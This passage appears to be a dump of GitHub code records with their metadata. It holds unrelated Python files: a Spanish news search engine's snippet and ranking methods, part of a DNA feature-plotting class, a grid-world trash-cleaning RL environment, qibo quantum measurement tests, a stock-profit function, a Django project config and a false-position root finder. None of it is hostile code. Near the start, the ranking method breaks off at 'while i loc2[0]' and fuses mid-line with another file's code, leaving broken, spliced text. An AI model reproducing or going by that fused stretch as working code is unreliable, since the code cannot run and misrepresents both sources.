create_snippet(self, posts, terms):\n \"\"\"\n Crea un snippet de los términos que aparecen en la query y en el documento\n\n param: \"posts\": posting list de los documentos que 
coinciden con la query\n \"terms\": términos que aparecen en la query\n\n \"\"\"\n lista_snippets = {}\n positional = False\n\n for noticia in posts:\n (doc_id, posicion) = self.news[noticia][0]\n f = self.docs[doc_id]\n lista_snippets.setdefault(noticia,[])\n with open(f) as fh:\n jlist = json.load(fh)\n news = jlist[posicion]\n\n for term in terms:\n field = 'article' #Valor por defecto\n if term.find('\"')==0:\n #Es posicional\n positional = True\n term = term[1:len(term)-1]\n else:\n #No es posici\n positional = False\n aux = term.split(\":\")\n if len(aux) > 1:\n #Tiene keywords\n term = aux[1]\n field = aux[0]\n\n\n if self.use_stemming is True and positional is False:\n stem = self.stemmer.stem(term)\n if len(stem) == len(term):\n pattern = re.compile(r'\\b({0})\\b'.format(term), flags=re.IGNORECASE) #La longitud del stem es la misma, puede que solo quite acentos\n else:\n pattern = re.compile(r'\\b({0})'.format(stem), flags=re.IGNORECASE) #Puede no haber espacio al final al ser stem\n else:\n pattern = re.compile(r'\\b({0})\\b'.format(term), flags=re.IGNORECASE)\n\n #Separamos la palabra del resto del texto\n if self.use_stemming: \n words = re.split(pattern, self.normalize(news[field]))\n else:\n words = re.split(pattern, news[field])\n\n if len(words) > 1:\n precedente = ' '.join(words[0].split()[-3:])\n consecuente = ' '.join(words[2].split()[:3])\n\n if self.use_stemming is True and positional is False:\n result = \"...\" + precedente + \" \" + stem + \"\" + consecuente + \"...\"\n else:\n result = \"...\" + precedente + \" \" + term + \" \" + consecuente + \"...\"\n \n lista_snippets[noticia].append(result)\n \n \n return lista_snippets\n \n\n def normalize(self, s):\n \"\"\"\n Elimina las tildes de un texto\n\n :param\n s: texto a normalizar\n \n :return: texto s sin tildes\n \"\"\"\n replacements = (\n (\"á\", \"a\"),\n (\"é\", \"e\"),\n (\"í\", \"i\"),\n (\"ó\", \"o\"),\n (\"ú\", \"u\"),\n )\n for a, b in replacements:\n s = s.replace(a, b).replace(a.upper(), b.upper())\n return s\n\n def rank_result(self, result, query):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE RANKING\n\n Ordena los resultados de una query.\n\n param: \"result\": lista de resultados sin ordenar\n \"query\": query, puede ser la query original, la query procesada o una lista de terminos\n\n\n return: la lista de resultados ordenada\n\n \"\"\"\n self.weight #Aquí almacenaremos la Score de cada documento\n fields = []\n terms = []\n\n for term in query:\n aux = term.split(':')\n field = 'article'\n if len(aux) > 1:\n #Tiene keyword\n field = aux[0]\n term = aux[1]\n if term.find('\"')==0: \n #Es posicional\n term = term[1:len(term)-1]\n for subterm in term.split(' '):\n terms.append(subterm)\n fields.append(field)\n else:\n #No es posicional\n terms.append(term)\n fields.append(field)\n else:\n #No tiene keyword\n if term.find('\"')==0: \n #Es posicional\n term = term[1:len(term)-1] #Quitamos las comillas\n for subterm in term.split(' '):\n terms.append(subterm)\n fields.append(field)\n else:\n #No es posicional\n terms.append(term)\n fields.append(field) \n\n\n rareza_termino = []\n i=0\n if self.multifield is True:\n if self.use_stemming is True: \n #Multifield y Stemming\n while i < len(terms):\n stem = self.stemmer.stem(terms[i])\n if stem in self.sindex:\n term_stem = self.sindex[stem]\n rareza_termino.append(0)\n for t in term_stem:\n if t in list(self.index[fields[i]]):\n rareza_termino[i] += len(self.index[fields[i]][t])\n if rareza_termino[i] == 0:\n rareza_termino[i] = 100000 #Ponemos un valor 
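`normalize` above strips accents with a hand-written vowel table. A more general alternative (not what this file does) decomposes the string to NFD and drops the combining marks; note it also folds ñ to n, which may be undesirable for Spanish text:

```python
import unicodedata

def strip_accents(s):
    """Remove combining marks: decompose to NFD, drop category-Mn chars."""
    return "".join(ch for ch in unicodedata.normalize("NFD", s)
                   if unicodedata.category(ch) != "Mn")

assert strip_accents("canción") == "cancion"
```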
alto ya que queremos usar la inversa\n i+=1\n else: \n #Multifield y No Stemming\n while i < len(terms):\n if terms[i] in self.index[fields[i]]:\n rareza_termino.append(len(self.index[fields[i]][terms[i]]))\n else:\n rareza_termino.append(100000) #Ponemos un valor alto ya que queremos usar la inversa\n \n i+=1\n else:\n if self.use_stemming is True: \n #No Multifield y Stemming\n while i < len(terms):\n stem = self.stemmer.stem(terms[i])\n if stem in self.sindex:\n term_stem = self.sindex[stem]\n rareza_termino.append(0)\n for t in term_stem:\n if t in list(self.index.keys()):\n rareza_termino[i] += len(self.index[t])\n if rareza_termino[i] == 0:\n rareza_termino[i] = 100000 #Ponemos un valor alto ya que queremos usar la inversa\n\n i+=1\n \n else: \n #No Multifield y no Stemming\n while i loc2[0]\n\n @property\n def length(self):\n \"\"\"Return the length of the feature (end-start)\"\"\"\n return abs(self.end - self.start)\n\n @property\n def x_center(self):\n \"\"\"Return the x-center of the feature, (start+end)/2\"\"\"\n return 0.5 * (self.start + self.end)\n\n @staticmethod\n def from_biopython_feature(feature, **props):\n \"\"\"Create a GraphicalFeature from a Biopython.Feature object.\"\"\"\n return GraphicFeature(start=feature.location.start,\n end=feature.location.end,\n strand=feature.location.strand,\n **props)\n\n def __repr__(self):\n return ((\"GF(%(label)s, %(start)d-%(end)d \" % self.__dict__) +\n (\")\" if self.strand is None else \"(%d))\" % self.strand))\n","repo_name":"cdnstp/SCCmec_CLA","sub_path":"sccmec_cla/lib/python3.7/site-packages/dna_features_viewer/GraphicFeature.py","file_name":"GraphicFeature.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"10564890204","text":"import numpy as np\nimport random\nfrom agent import Agent, Action\nfrom matplotlib.pyplot import *\n\n\n### ENVIRONMENT ###\n\nclass Environment:\n '''The class that represents our pretty environment'''\n\n # some defaults parameters\n default_parameters = {\n 'width': 10,\n 'height': 10,\n 'obstacles': [(2, 2), (3, 2), (4, 2), (7, 1), (8, 1), (8,2),\n (8, 3), (8, 4), (4, 3), (4, 4), (4, 5), (5, 5),\n (5, 6), (5, 7), (1, 7), (1, 8), (2, 8), (3, 8), (6, 7), (7, 7)],\n 'nb_trashes': 22\n }\n\n def __init__(self, w=0, h=0, nb_trashes=0):\n '''\n Initialize the environment\n\n :param agent: the agent to add in the environment\n :param w: width of the environment (not including walls)\n :param h: height of the environment (not including walls)\n :param nb_trashes: number of trashes in the environment\n '''\n\n self.width = self.default_parameters['width'] if w == 0 else w # setting width\n self.height = self.default_parameters['height'] if h == 0 else h # setting height\n\n self.obstacles = self.default_parameters['obstacles'] # set the obstacles\n\n # stuffs related to the Agent (action space, state space, the agent itself)\n self.action_space_n = Action.size() # cardinality of action space\n self.state_space_n = 2 * (self.width + 2) * (self.height + 2) # cardinality of action space : Position of agent\n self.state_features = 3 # position and presence of reward\n self.position = (0, 0)\n\n # start throwing trashes around to get the agent a job\n self.nb_trashes = self.default_parameters['nb_trashes'] if nb_trashes == 0 else nb_trashes\n self.clean_trash = 0\n self.trashes = [] # all positions of trashes\n i = 0\n random.seed(self.nb_trashes) # to ensure that every time the random will return the same 
sequence\n while i < self.nb_trashes:\n x = random.randint(1, self.width+1)\n y = random.randint(1, self.height+1)\n\n # if newly generated position is not that of another trash / an obstacle / the initial position of the agent\n if (x, y) not in self.trashes and (x, y) not in self.obstacles and (x, y) != self.position:\n self.trashes.append((x, y))\n i += 1\n\n # for conversion between position and tile #\n # this will help when using Q_table #\n self.fig = figure(figsize=(7, 7))\n self.ax = self.fig.add_subplot(1, 1, 1)\n self.xticks = np.arange(-0.5, self.width + 1.5, 1)\n self.yticks = np.arange(-0.5, self.height + 1.5, 1)\n self.ax.grid()\n self.ax.set_xticks(self.xticks)\n self.ax.set_yticks(self.yticks)\n self.ax.plot(np.array(self.trashes)[:, 0], np.array(self.trashes)[:, 1], \"co\", markersize=30, alpha=0.2)\n self.ax.plot(np.array(self.obstacles)[:, 0], np.array(self.obstacles)[:, 1], \"ks\", markersize=30, alpha=0.4)\n # drawing the walls\n self.ax.plot(range(self.width + 2), 0 * np.ones(self.width + 2), 'r')\n self.ax.plot(range(self.width + 2), (self.height + 1) * np.ones(self.width + 2), 'r')\n self.ax.plot(0 * np.ones(self.height + 2), range(self.height + 2), 'r')\n self.ax.plot((self.width + 1) * np.ones(self.height + 2), range(self.height + 2), 'r')\n\n def display(self):\n '''\n Display the environment\n '''\n\n ion()\n self.ax.plot(self.position[0], self.position[1], \"rX\", markersize=30)\n show()\n pause(0.3)\n self.ax.plot(self.position[0], self.position[1], \"ws\", markersize=30)\n\n def go_into_obstacle(self, new_pos):\n '''\n Verify whether the agent hits an obstacle\n\n :param new_pos: next state after execution an action\n :return: True if new position is an obstacle\n '''\n\n return new_pos in self.obstacles\n\n def step(self, a):\n '''\n Execute action a\n\n :param a: an action in the action space {LEFT, RIGHT, UP, DOWN}\n :return: new state, reward, termination flag, info\n '''\n\n # prepare to calculate the new state\n go_into_wall = False\n go_into_obstacle = False\n\n # TO DISCUSS\n # so, what is the limit of walls? 
-1 and width + 1 | height + 1 ?\n # TO DISCUSS\n '''\n Rescale the map in order to add wall position \n Wall position:\n [0, 0] , [0, 1] ,..., [0, HEIGHT + 2] (Left wall)\n [WIDTH + 2, 0] , [WIDTH + 2, 1] ,..., [WIDTH + 2, HEIGHT + 2] (Right wall)\n [0, 0] , [1, 0], ,..., [WIDTH + 2, 0] (Bottom wall)\n [0, HEIGHT + 2] , [1, HEIGHT + 2],..., [WIDTH + 2, HEIGHT + 2] (Upper wall)\n After this, add terminal condition when robot goes into the wall\n '''\n\n # LEFT\n if a == Action.LEFT:\n new_pos = (self.position[0] - 1, self.position[1])\n if new_pos[0] == 0:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n # RIGHT\n elif a == Action.RIGHT:\n new_pos = (self.position[0] + 1, self.position[1])\n if new_pos[0] == self.width + 1:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n # DOWN\n elif a == Action.DOWN:\n new_pos = (self.position[0], self.position[1] - 1)\n if new_pos[1] == 0:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n # UP\n else:\n new_pos = (self.position[0], self.position[1] + 1)\n if new_pos[1] == self.height + 1:\n go_into_wall = True\n else:\n go_into_obstacle = self.go_into_obstacle(new_pos)\n '''\n if go_into_wall:\n new_pos = self.agent.position # to prevent the case where pos2tile return -1\n else:\n self.agent.position = new_pos\n '''\n self.position = new_pos\n #new_pos = self.pos2tile(new_pos)\n state = np.append(np.array(new_pos), 0)\n\n # default values\n reward = -0.01\n done = False\n info = \"(\" + str(self.position) + \", 0)\"\n\n # if the agent hits a wall or an obstacle, diminish the reward\n if go_into_wall or go_into_obstacle:\n done = True\n reward = -1\n\n # if the agent manages to clean the trashes which is its job\n if self.position in self.trashes:\n self.trashes.remove(self.position)\n self.clean_trash += 1\n info = \"(\" + str(self.position) + \", 1)\"\n reward = 1\n #new_pos += (self.height + 2) * (self.width + 2) # the state (x, y, bool) where bool represent the presence of trash\n state[2] = 1\n\n\n # hits walls and screams for help\n if go_into_wall:\n info = \"Go into walls!\"\n\n # hits obstacle and also screams for help\n if go_into_obstacle:\n info = \"Go into obstacle!\"\n\n return [state, reward, done, info]\n\n def reset(self):\n '''\n Reinitialize the starting position, and put back the trashes that have been cleaned (right at the same position as previously initialized)\n\n Returns\n -------\n new_pos: new initial position\n '''\n\n self.trashes.clear()\n self.clean_trash = 0\n i = 0\n random.seed(self.nb_trashes) # return the same sequence of random numbers\n while i < self.nb_trashes:\n x = random.randint(1, self.width)\n y = random.randint(1, self.height)\n if (x, y) not in self.trashes and (x, y) not in self.obstacles:\n self.trashes.append((x, y))\n i += 1\n\n # random position starting point for robot\n # new position must be different from obstacles!\n new_pos = (np.random.randint(1, self.width+1), np.random.randint(1, self.height+1))\n while new_pos in self.obstacles:\n new_pos = (np.random.randint(1, self.width+1), np.random.randint(1, self.height+1))\n self.position = new_pos\n state = np.append(np.array(new_pos), 0)\n\n # drawing stuffs\n cla()\n self.ax.grid()\n self.ax.set_xticks(self.xticks)\n self.ax.set_yticks(self.yticks)\n self.ax.plot(np.array(self.trashes)[:, 0], np.array(self.trashes)[:, 1], \"co\", markersize=25, alpha=0.2)\n self.ax.plot(np.array(self.obstacles)[:, 0], np.array(self.obstacles)[:, 1], \"ks\", 
markersize=25, alpha=0.4)\n # drawing the walls\n self.ax.plot(range(self.width+2), np.zeros(self.width+2), 'r')\n self.ax.plot(range(self.width+2), (self.height + 1) * np.ones(self.width+2), 'r')\n self.ax.plot(np.zeros(self.height+2), range(self.height+2), 'r')\n self.ax.plot((self.width + 1) * np.ones(self.height+2), range(self.height+2), 'r')\n\n # return the new initial position\n #new_pos = self.pos2tile(new_pos)\n if self.position in self.trashes:\n #new_pos = new_pos + (self.width + 2) * (self.height + 2)\n state[2] = 1\n return state\n\n def action_sample(self):\n '''\n Generate random action\n\n :return: action to execute\n '''\n return np.random.randint(0, self.action_space_n)\n\n # Not being used at the moment\n def rollout(self, n_iter, pi):\n '''\n Generate the data (state, action, reward) for n_iter iterations in advanced by following policy pi\n\n :param n_iter: number of iterations to anticipate\n :param pi: the policy to follow (matrix of probability of actions to take at each state)\n :return: a set of states, actions, and reward\n '''\n states = []\n actions = []\n rewards = []\n\n s = self.position\n trashes = self.trashes.copy()\n sprime = self.position\n states.append(self.pos2tile(s))\n for i in range(n_iter):\n a = np.argmax(pi[sprime]) # get the action that maximizes the policy map\n actions.append(a)\n sprime, reward, done, info = self.step(a)\n states.append(sprime)\n rewards.append(reward)\n\n if done:\n break\n\n # put back the intial state\n self.position = s\n self.trashes = trashes\n\n return [states, actions, rewards]","repo_name":"MinhHuong/INF581_project","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":10612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22451136805","text":"\"\"\"Test :class:`qibo.abstractions.gates.M` as standalone and as part of circuit.\"\"\"\nimport pytest\nimport numpy as np\nfrom qibo import models, gates, K\nfrom qibo.tests.utils import random_state, random_density_matrix\n\n\n@pytest.mark.parametrize(\"nqubits,targets\",\n [(2, [1]), (3, [1]), (4, [1, 3]), (5, [0, 3, 4]),\n (6, [1, 3]), (4, [0, 2])])\ndef test_measurement_collapse(backend, nqubits, targets):\n initial_state = random_state(nqubits)\n gate = gates.M(*targets, collapse=True)\n final_state = gate(K.cast(np.copy(initial_state)), nshots=1)\n results = gate.result.binary[0]\n slicer = nqubits * [slice(None)]\n for t, r in zip(targets, results):\n slicer[t] = int(r)\n slicer = tuple(slicer)\n initial_state = initial_state.reshape(nqubits * (2,))\n target_state = np.zeros_like(initial_state)\n target_state[slicer] = initial_state[slicer]\n norm = (np.abs(target_state) ** 2).sum()\n target_state = target_state.ravel() / np.sqrt(norm)\n K.assert_allclose(final_state, target_state)\n\n\n@pytest.mark.parametrize(\"nqubits,targets\",\n [(2, [1]), (3, [1]), (4, [1, 3]), (5, [0, 3, 4])])\ndef test_measurement_collapse_density_matrix(backend, nqubits, targets):\n initial_rho = random_density_matrix(nqubits)\n gate = gates.M(*targets, collapse=True)\n gate.density_matrix = True\n final_rho = gate(K.cast(np.copy(initial_rho)), nshots=1)\n results = gate.result.binary[0]\n target_rho = np.reshape(initial_rho, 2 * nqubits * (2,))\n for q, r in zip(targets, results):\n r = int(r)\n slicer = 2 * nqubits * [slice(None)]\n slicer[q], slicer[q + nqubits] = 1 - r, 1 - r\n target_rho[tuple(slicer)] = 0\n slicer[q], slicer[q + nqubits] = r, 1 - r\n target_rho[tuple(slicer)] = 0\n 
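`Environment` exposes the familiar reset/step/action_sample surface, with `step` returning `[state, reward, done, info]`. A minimal random-policy episode against that interface (a sketch; it assumes the class above is importable):

```python
def random_episode(env, max_steps=200):
    """Run one episode with uniformly random actions; return total reward."""
    state = env.reset()
    total_reward = 0.0
    for _ in range(max_steps):
        action = env.action_sample()
        state, reward, done, _info = env.step(action)
        total_reward += reward
        if done:                      # hit a wall or an obstacle
            break
    return total_reward

# e.g. print(random_episode(Environment()))
```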
slicer[q], slicer[q + nqubits] = 1 - r, r\n target_rho[tuple(slicer)] = 0\n target_rho = np.reshape(target_rho, initial_rho.shape)\n target_rho = target_rho / np.trace(target_rho)\n K.assert_allclose(final_rho, target_rho)\n\n\ndef test_measurement_collapse_errors(backend):\n gate = gates.M(0, 1, collapse=True)\n state = np.ones(4) / 4\n with pytest.raises(ValueError):\n state = gate(K.cast(state), nshots=100)\n\n\ndef test_measurement_collapse_bitflip_noise(backend, accelerators):\n K.set_seed(123)\n c = models.Circuit(4, accelerators)\n with pytest.raises(NotImplementedError):\n output = c.add(gates.M(0, 1, p0=0.2, collapse=True))\n\n\n@pytest.mark.parametrize(\"effect\", [False, True])\ndef test_measurement_result_parameters(backend, accelerators, effect):\n c = models.Circuit(4, accelerators)\n if effect:\n c.add(gates.X(0))\n output = c.add(gates.M(0, collapse=True))\n c.add(gates.RX(1, theta=np.pi * output / 4))\n\n target_c = models.Circuit(4)\n if effect:\n target_c.add(gates.X(0))\n target_c.add(gates.RX(1, theta=np.pi / 4))\n K.assert_allclose(c(), target_c())\n\n\ndef set_device_seed(seed, accelerators):\n if accelerators:\n with K.on_cpu():\n K.set_seed(seed)\n else:\n K.set_seed(seed)\n\n\ndef test_measurement_result_parameters_random(backend, accelerators):\n test_device = K.cpu_devices[0] if accelerators else K.default_device\n initial_state = random_state(4)\n set_device_seed(123, accelerators)\n c = models.Circuit(4, accelerators)\n output = c.add(gates.M(1, collapse=True))\n c.add(gates.RY(0, theta=np.pi * output / 5))\n c.add(gates.RX(2, theta=np.pi * output / 4))\n result = c(initial_state=np.copy(initial_state))\n assert len(output.frequencies()) == 1\n\n set_device_seed(123, accelerators)\n with K.device(test_device):\n collapse = gates.M(1, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n if int(collapse.result.outcome()):\n target_state = gates.RY(0, theta=np.pi / 5)(target_state)\n target_state = gates.RX(2, theta=np.pi / 4)(target_state)\n K.assert_allclose(result, target_state)\n\n\n@pytest.mark.parametrize(\"use_loop\", [True, False])\ndef test_measurement_result_parameters_repeated_execution(backend, accelerators, use_loop):\n test_device = K.cpu_devices[0] if accelerators else K.default_device\n initial_state = random_state(4)\n set_device_seed(123, accelerators)\n c = models.Circuit(4, accelerators)\n output = c.add(gates.M(1, collapse=True))\n c.add(gates.RX(2, theta=np.pi * output / 4))\n if use_loop:\n final_states = []\n for _ in range(20):\n final_states.append(c(np.copy(initial_state)).state())\n else:\n final_states = c(initial_state=np.copy(initial_state), nshots=20)\n\n set_device_seed(123, accelerators)\n target_states = []\n with K.device(test_device):\n for _ in range(20):\n collapse = gates.M(1, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n if int(collapse.result.outcome()):\n target_state = gates.RX(2, theta=np.pi / 4)(target_state)\n target_states.append(np.copy(target_state))\n final_states = K.stack(final_states)\n target_states = K.stack(target_states)\n K.assert_allclose(final_states, target_states)\n\n\ndef test_measurement_result_parameters_repeated_execution_final_measurements(backend):\n initial_state = random_state(4)\n K.set_seed(123)\n c = models.Circuit(4)\n output = c.add(gates.M(1, collapse=True))\n c.add(gates.RY(0, theta=np.pi * output / 3))\n c.add(gates.RY(2, theta=np.pi * output / 4))\n c.add(gates.M(0, 1, 2, 3))\n result = c(initial_state=np.copy(initial_state), 
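The tests build their reference states by zeroing the amplitudes inconsistent with the measured outcome and renormalizing. The same construction for a single qubit in plain NumPy, independent of qibo:

```python
import numpy as np

def collapse_qubit(state, nqubits, qubit, outcome):
    """Project an nqubits state vector onto `outcome` (0 or 1) of `qubit`
    and renormalize, mirroring the target-state construction above."""
    psi = state.reshape(nqubits * (2,)).copy()
    slicer = [slice(None)] * nqubits
    slicer[qubit] = 1 - outcome          # zero the branch that was not observed
    psi[tuple(slicer)] = 0
    psi = psi.ravel()
    return psi / np.sqrt(np.sum(np.abs(psi) ** 2))
```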
nshots=30)\n final_samples = result.samples(binary=False)\n\n K.set_seed(123)\n target_samples = []\n for _ in range(30):\n collapse = gates.M(1, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n if int(collapse.result.outcome()):\n target_state = gates.RY(0, theta=np.pi / 3)(target_state)\n target_state = gates.RY(2, theta=np.pi / 4)(target_state)\n with K.device(K.default_device):\n target_result = gates.M(0, 1, 2, 3)(target_state)\n target_samples.append(target_result.decimal[0])\n target_samples = K.stack(target_samples)\n K.assert_allclose(final_samples, target_samples)\n\n\ndef test_measurement_result_parameters_multiple_qubits(backend):\n initial_state = random_state(4)\n K.set_seed(123)\n c = models.Circuit(4)\n output = c.add(gates.M(0, 1, 2, collapse=True))\n c.add(gates.RY(1, theta=np.pi * output[0] / 5))\n c.add(gates.RX(3, theta=np.pi * output[2] / 3))\n result = c(initial_state=np.copy(initial_state))\n\n K.set_seed(123)\n collapse = gates.M(0, 1, 2, collapse=True)\n target_state = collapse(K.cast(np.copy(initial_state)))\n # not including in coverage because outcomes are probabilistic and may\n # not occur for the CI run\n if int(collapse.result.outcome(0)): # pragma: no cover\n target_state = gates.RY(1, theta=np.pi / 5)(target_state)\n if int(collapse.result.outcome(2)): # pragma: no cover\n target_state = gates.RX(3, theta=np.pi / 3)(target_state)\n K.assert_allclose(result, target_state)\n","repo_name":"shangtai/qibo-error-mitigation","sub_path":"src/qibo/tests/test_measurement_gate_collapse.py","file_name":"test_measurement_gate_collapse.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"17608007011","text":"def buysell_stock(arr):\n n=len(arr)\n maxpro=0\n buy_index = sell_index = 0\n for i in range(n):\n for j in range(i+1,n):\n \n # if arr[j]>arr[i]:\n # maxpro=max(maxpro,arr[j]-arr[i])\n if arr[j] - arr[i] > maxpro:\n maxpro=max(maxpro,arr[j]-arr[i])\n buy_index=i\n sell_index=j\n\n\n return maxpro,buy_index,sell_index\narr=[7,1,5,3,6,4]\nprint(buysell_stock(arr))\n# arr=[7,1,5,3,6,4]\n","repo_name":"mrHimanshu4u/75Days_Challenge","sub_path":"Day10/buysell_stock.py","file_name":"buysell_stock.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18414232194","text":"import os\nimport sys\nimport subprocess\n\nsplit_cwd = os.path.split(os.getcwd())\n# We should be running this from the resting directory within the repository, although this is a problem for documentation generation\n#assert split_cwd[1] == 'resting'\nrepository_top_directory = split_cwd[0]\n\napp_name = 'test'\n\n## Run on NERSC Spin\n\n#server_name = ''\n#platform = 'spin'\nNERSC_project_id = ''\n\n## Run on a standalone server\n\nserver_name = 'localhost'\nplatform = sys.platform\n\nengine = 'docker'\n#engine = 'podman'\n\n# These are the file locations in the host filesystem, as needed on a standalone server\n# Under Cygwin on a Windows computer, these must be translated to be recognized by Docker, which is installed separately\n# http://stackoverflow.com/questions/8220108/ddg#8220141\nif sys.platform == 'cygwin':\n completed_process = subprocess.run(['cygpath','-w',repository_top_directory + '/secrets'],capture_output=True)\n secrets_directory = completed_process.stdout.decode()[:-1]\n completed_process = subprocess.run(['cygpath','-w',repository_top_directory + 
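`buysell_stock` above compares every pair of days, which is O(n²). The standard single-pass version tracks the cheapest price seen so far and keeps the same (profit, buy index, sell index) return shape (a sketch, not a drop-in from that repository):

```python
def buysell_stock_fast(prices):
    """Best single buy/sell profit in O(n): remember the cheapest day."""
    best_profit, buy_index, sell_index = 0, 0, 0
    min_index = 0
    for i in range(1, len(prices)):
        if prices[i] < prices[min_index]:
            min_index = i                       # new cheapest buy day
        elif prices[i] - prices[min_index] > best_profit:
            best_profit = prices[i] - prices[min_index]
            buy_index, sell_index = min_index, i
    return best_profit, buy_index, sell_index

assert buysell_stock_fast([7, 1, 5, 3, 6, 4]) == (5, 1, 4)
```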
'/pgdata'],capture_output=True) \n pgdata_directory = completed_process.stdout.decode()[:-1]\nelse:\n secrets_directory = repository_top_directory + '/secrets'\n pgdata_directory = repository_top_directory + '/pgdata'\n\n# The webserver/ssl directory within the repository and its contents are automatically copied recursively onto /etc/ssl within the webserver Docker image, these are required on a standalone server\n# Specify the file locations within the Docker image\nssl_certificate_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\nssl_certificate_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'\n\n## Homepage\n\n# This is the Django template for the site homepage, assumed to be in the webserver/website/templates directory within the repository. If blank, the API root will be the site homepage.\n#index_template = ''\nindex_template = 'index.html'\n\n## API\n\n# Blank or null will use the default URL scheme, with the API root as the default landing page\n# This is ignored if a homepage template is not given above\napi_prefix = 'api'\n\n# Description format:\n# { \n# ModelName_str : {\n# ModelAttribute_str : {\n# \"type\" : Instanciation_str,\n# \"filters\" : [ FilterName_str, ... ]\n# }, ...\n# }, ...\n# }\n\nmodels = {\n 'Independent':{\n # # This is the default field added by Django\n # 'id' : {\n # 'type': 'models.AutoField(primary_key=True)',\n # 'filters' : ['exact','in']\n # },\n 'charfield' : {\n 'type' : 'models.CharField(max_length=32,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'intfield' : {\n 'type' : 'models.IntegerField(null=True,blank=True)',\n 'filters' : ['isnull','exact','gte','lte'],\n },\n 'floatfield' : {\n 'type' : 'models.FloatField(null=True,blank=True)',\n 'filters' : ['exact','isnull','gte','lte'],\n },\n 'urlfield' : {\n 'type' : 'models.URLField(max_length=256,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'textfield' : {\n 'type' : 'models.TextField(max_length=8192,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n # Storage locations can be customized through the \"upload_to\" keyword parameter\n # For example: upload_to='independent/%Y/%m/%d'\n # file:///usr/share/doc/python-django/html/ref/models/fields.html#django.db.models.FileField.upload_to\n 'filefield' : {\n 'type' : 'models.FileField(max_length=256,blank=True)',\n 'filters' : [],\n },\n },\n 'Dependent':{\n # # This is usually automatically added by Django\n # 'id' : {\n # 'type': 'models.AutoField(primary_key=True)',\n # 'filters' : ['exact','in']\n # },\n 'charfield' : {\n 'type' : 'models.CharField(max_length=32,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'intfield' : {\n 'type' : 'models.IntegerField(null=True,blank=True)',\n 'filters' : ['isnull','exact','gte','lte'],\n },\n 'floatfield' : {\n 'type' : 'models.FloatField(null=True,blank=True)',\n 'filters' : ['exact','isnull','gte','lte'],\n },\n 'urlfield' : {\n 'type' : 'models.URLField(max_length=256,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n 'textfield' : {\n 'type' : 'models.TextField(max_length=8192,blank=True)',\n 'filters' : ['exact','iexact','in','istartswith','icontains','iendswith','iregex','search'],\n },\n # Storage locations can be customized through the upload_to keyword parameter\n # 
file:///usr/share/doc/python-django/html/ref/models/fields.html#django.db.models.FileField.upload_to\n 'filefield' : {\n 'type' : 'models.FileField(max_length=256,blank=True)',\n 'filters' : [],\n },\n 'onetoonefield' : {\n 'type' : 'models.OneToOneField(Independent,related_name=\"onetoonefield\",on_delete=models.CASCADE)',\n 'filters' : [],\n },\n 'foreignkeyfield' : {\n 'type' : 'models.ForeignKey(Independent,related_name=\"onetomanyfield\",on_delete=models.CASCADE)',\n 'filters' : [],\n },\n 'manytomanyfield' : {\n 'type' : 'models.ManyToManyField(Independent,related_name=\"manytomanyfield\")',\n 'filters' : [],\n },\n },\n }\n","repo_name":"dani-lbnl/resting","sub_path":"resting/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"4539564497","text":"import sympy as sym\nfrom tabulate import tabulate\nx = sym.Symbol(\"x\")\nf_x = 1.2 * x**5 - 2.57*x + 2\n\n\ndef f(f_x, val):\n return f_x.evalf(subs={x: val})\n\n\ndef falsePosition(f_x, x0, x1, e=0.00001):\n step = 1\n diff_f = sym.diff(f_x, x)\n ivl = sym.Interval (x0, x1)\n if abs(sym.minimum(diff_f, x, ivl)) < abs(sym.maximum(diff_f, x, ivl)):\n m = abs(sym.minimum(diff_f, x, ivl))\n M = abs(sym.maximum(diff_f, x, ivl))\n else:\n m = abs(sym.maximum(diff_f, x, ivl))\n M = abs(sym.minimum(diff_f, x, ivl))\n\n print(\"\\n\\n*** FALSE POSITION METHOD IMPLEMENTATION ***\")\n condition = True\n lst_x = []\n lst_e1 = []\n lst_e2 = []\n while condition:\n x2 = x0 - (x1 - x0) * f(f_x, x0) / (f(f_x, x1) - f(f_x, x0))\n lst_x.append(x2)\n print(\"Iteration-%d, x2 = %0.8f and f(x2) = %0.8f\" % (step, x2, f(f_x, x2)))\n # print()\n if f(f_x, x0) * f(f_x, x2) < 0:\n x1 = x2\n else:\n x0 = x2\n\n step = step + 1\n condition = abs(f(f_x, x2)) > e\n err_1 = abs(f(f_x, x2)) / m\n lst_e1.append(err_1)\n # lst_e2.append(err_2)\n\n print(\"\\nRequired root is: %0.8f\" % x2)\n print(f\"f'x = {sym.diff(f_x, x)}\")\n print(f\"f\\\"x = {sym.diff(f_x, x, x)}\")\n print(f\"m = {m}, M = {M}\")\n print(\"Error 1 is: %0.8f\" %abs(f(f_x, x2)/m))\ndef main():\n \n # sol = sym.nsolve(f_x, -1.3)\n # print(sol)\n x0 = input(\"First Guess: \")\n x1 = input(\"Second Guess: \")\n e = input(\"Tolerable Error: \")\n\n x0 = float(x0)\n x1 